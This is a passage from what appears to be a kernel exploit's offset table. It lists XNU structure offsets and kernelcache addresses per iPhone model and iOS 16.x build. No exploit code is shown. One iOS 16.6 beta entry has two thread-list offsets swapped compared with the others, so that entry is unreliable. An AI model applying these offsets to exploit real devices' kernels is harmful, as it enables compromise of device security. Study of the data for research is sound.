0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a471208, .kernelcache__gPhysBase = 0xfffffff00793c100, .kernelcache__gPhysSize = 0xfffffff00793c100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4af520, .kernelcache__perfmon_dev_open = 0xfffffff007efd480, .kernelcache__ptov_table = 0xfffffff0078ef180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, .kernelcache__vm_pages = 0xfffffff0078ebec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, .kernelcache__vn_kqfilter = 0xfffffff007f49fe8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x380 - 0x18, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x80 - 0x28, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000,//good .kernelcache__cdevsw = 0xfffffff00a519a30, //good .kernelcache__gPhysBase = 0xfffffff0079502a8, //good .kernelcache__gPhysSize = 0xfffffff0079502b0, //good .kernelcache__gVirtBase = 0xfffffff00794e460, //good .kernelcache__perfmon_devices = 0xfffffff00a559550, //good .kernelcache__perfmon_dev_open = 0xfffffff007f1db9c, //good .kernelcache__ptov_table = 0xfffffff0079039c0, //good .kernelcache__vm_first_phys_ppnum = 0xfffffff00a558910, //good .kernelcache__vm_pages = 0xfffffff007900110, //good .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902970, //good .kernelcache__vm_page_array_ending_addr = 0xfffffff00a558908, //good .kernelcache__vn_kqfilter = 0xfffffff007f6a0b8, //good }, // End iPhone 13 Mini // // Start iPhone SE 3rd // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d9190, .kernelcache__gPhysBase = 0xfffffff0078680c8, .kernelcache__gPhysSize = 0xfffffff0078680c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078662a8, .kernelcache__perfmon_devices = 0xfffffff00a4143b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef0fa8, .kernelcache__ptov_table = 0xfffffff00781b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a413800, .kernelcache__vm_pages = 0xfffffff007818098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00781a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4137f8, .kernelcache__vn_kqfilter = 0xfffffff007f40fd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e1190, .kernelcache__gPhysBase = 0xfffffff0078681b0, .kernelcache__gPhysSize = 0xfffffff0078681b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007866390, .kernelcache__perfmon_devices = 0xfffffff00a41c3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef105c, .kernelcache__ptov_table = 0xfffffff00781b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a41b800, .kernelcache__vm_pages = 0xfffffff0078180d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00781a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a41b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f41074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e1190, .kernelcache__gPhysBase = 0xfffffff0078681b0, .kernelcache__gPhysSize = 0xfffffff0078681b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007866390, .kernelcache__perfmon_devices = 0xfffffff00a41c3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef105c, .kernelcache__ptov_table = 0xfffffff00781b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a41b800, .kernelcache__vm_pages = 0xfffffff0078180d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00781a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a41b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f41074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c5208, .kernelcache__gPhysBase = 0xfffffff007947fc0, .kernelcache__gPhysSize = 0xfffffff007947fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007946198, .kernelcache__perfmon_devices = 0xfffffff00a503520, .kernelcache__perfmon_dev_open = 0xfffffff007f11210, .kernelcache__ptov_table = 0xfffffff0078fb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a502990, .kernelcache__vm_pages = 0xfffffff0078f7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fa130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a502988, .kernelcache__vn_kqfilter = 0xfffffff007f5dae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c5208, .kernelcache__gPhysBase = 0xfffffff007947fc0, .kernelcache__gPhysSize = 0xfffffff007947fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007946198, .kernelcache__perfmon_devices = 0xfffffff00a503520, .kernelcache__perfmon_dev_open = 0xfffffff007f11210, .kernelcache__ptov_table = 0xfffffff0078fb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a502990, .kernelcache__vm_pages = 0xfffffff0078f7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fa130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a502988, .kernelcache__vn_kqfilter = 0xfffffff007f5dae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4cd208, .kernelcache__gPhysBase = 0xfffffff007948100, .kernelcache__gPhysSize = 0xfffffff007948100 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079462d8, .kernelcache__perfmon_devices = 0xfffffff00a50b520, .kernelcache__perfmon_dev_open = 0xfffffff007f11480, .kernelcache__ptov_table = 0xfffffff0078fb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a50a990, .kernelcache__vm_pages = 0xfffffff0078f7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fa130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a50a988, .kernelcache__vn_kqfilter = 0xfffffff007f5dfe8, }, // iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a579a30, .kernelcache__gPhysBase = 0xfffffff0079602a8, .kernelcache__gPhysSize = 0xfffffff0079602a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00795e460, .kernelcache__perfmon_devices = 0xfffffff00a5b9550, .kernelcache__perfmon_dev_open = 0xfffffff007f35b9c, .kernelcache__ptov_table = 0xfffffff0079139c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a5b8910, .kernelcache__vm_pages = 0xfffffff007910110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007912970, 